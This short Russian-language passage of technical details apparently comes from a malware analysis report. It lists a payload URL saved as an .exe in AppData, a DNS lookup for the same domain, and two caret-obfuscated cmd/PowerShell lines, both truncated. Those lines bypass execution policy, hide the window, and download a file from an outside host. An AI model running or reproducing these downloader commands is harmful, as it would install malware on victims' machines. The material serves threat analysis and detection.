Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^WE^RS^h^eL^l.^e^XE -E^xecu^ti^o^NpOLicY byPAs^S ^-^No^PRo^F^iL^e -W^iND^oWsTy^le^ HIDd^EN ^(^N^e^W-o^bjEct ^sYsteM^.N^E^T.^w^E^B^CL^ie^n^T)^.do^wNLO^a^d^f^iLe('http://www...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "PO^WE^RS^h^eL^l.^e^XE -E^xecu^ti^o^NpOLicY byPAs^S ^-^No^PRo^F^iL^e -W^iND^oWsTy^le^ HIDd^EN ^(^N^e^W-o^bjEct ^sYsteM^.N^E^T.^w^E^B^CL^ie^n^T)^.do^wNLO^a^d^f^iLe('http://www...' (со скрытым окном)